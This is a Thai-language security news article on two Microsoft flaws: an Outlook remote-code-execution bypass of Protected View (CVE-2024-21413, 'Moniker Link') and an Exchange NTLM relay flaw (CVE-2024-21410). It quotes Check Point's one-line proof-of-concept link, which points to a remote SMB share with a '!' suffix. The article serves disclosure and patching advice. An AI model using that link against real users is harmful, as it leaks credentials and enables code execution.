TechTalkThai ศูนย์รวมข่าว Enterprise IT ออนไลน์แห่งแรกในประเทศไทย
เรียกได้ว่ามาครบคู่องค์ประกอบกับการค้นพบช่องโหว่ใหม่ 2 รายการ โดยที่น่ากังวลที่สุดคือช่องโหว่ลอบรันโค้ดใน Microsoft Outlook ที่เป็นการลัดผ่านกลไกการป้องกันเพียงแค่เหยื่อคลิกลิงก์เข้าไป ในขณะที่ช่องโหว่บน Exchange Server สามารถถูกใช้เพื่อยกระดับสิทธิ์ได้ แต่ก็มองข้ามไม่ได้เช่นกันเพราะมีรายงานพบการใช้โจมตีจริงแล้ว ก่อนแพตช์เดือนนี้ออกเสียอีก
CVE-2024-21413
Check Point ได้รายงานการค้นพบช่องโหว่ลอบรันโค้ดนี้ (RCE) ไอเดียคือการช่วยให้ลัดผ่านการป้องกันในโหมด Protected View ที่ถูกออกแบบมาให้บล็อกเนื้อหาอันตรายในโหมดอ่านอย่างเดียว โดย Microsoft ชี้ว่าผู้โจมตีสำเร็จจะสามารถได้สิทธิ์ระดับสู่ เช่น การเขียน อ่าน หรือลบ รวมถึงนำไปสู่ข้อมูล NTLM Credentials และ ลอบรันโค้ด
ในรายงานของ Check Point ได้แสดงตัวอย่างการใช้งานช่องโหว่นี้ที่ตั้งชื่อว่า Moniker Link ดังนี้ “<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>” ไอเดียคือเหยื่อที่กดลิงก์จะไม่ได้รับการแจ้งเตือนหรือข้อผิดพลาดใด และมีการเข้าถึงไปยัง “\\10.10.111.111\test\test.rtf” ทั้งหมดเป็นความผิดพลาดของ API MkParseDisplayName ซึ่งทีม Check Point เผยว่ากระทบกับ Windows 10/11 และ Microsoft 365 (Office 2021) แน่นอน แต่อาจมากกว่านี้เพราะอยู่ใน COM API ที่มีมานานแล้ว ซึ่งผู้เชี่ยวชาญแนะว่าให้เร่งอัปเดต Outlook ของท่านอย่างด่วนที่สุด
CVE-2024-21410
ช่องโหว่นี้เกิดขึ้นกับ Exchange Server ซึ่งคนร้ายสามารถใช้เพื่อลอบทำ NTLM relay attack ได้ โดยเพียงแค่หาวิธีการให้เกิดการพิสูจน์ตนกับ NTLM relay server ที่คนร้ายควบคุมอยู่หรืแใช้ทำ man-in-the-middle attack ระหว่างเซิร์ฟเวอร์และ NTLM Client อย่าง outlook ได้
ผู้ใช้งานจาก Exchange Server 2019 จะได้รับแพตช์ใน Cumulative Update 14 แต่ในกรณีเวอร์ชัน 2016 อาจได้รับการอัปเดตผ่านทางแผน Extended Protection แต่ก็ไปอ่านคำแนะนำให้จงดีว่าอาจมีผลกระทบอย่างไรบ้าง
ที่มา : https://www.bleepingcomputer.com/news/security/microsoft-new-critical-exchange-bug-exploited-as-zero-day/ และ https://www.bleepingcomputer.com/news/security/new-critical-microsoft-outlook-rce-bug-is-trivial-to-exploit/
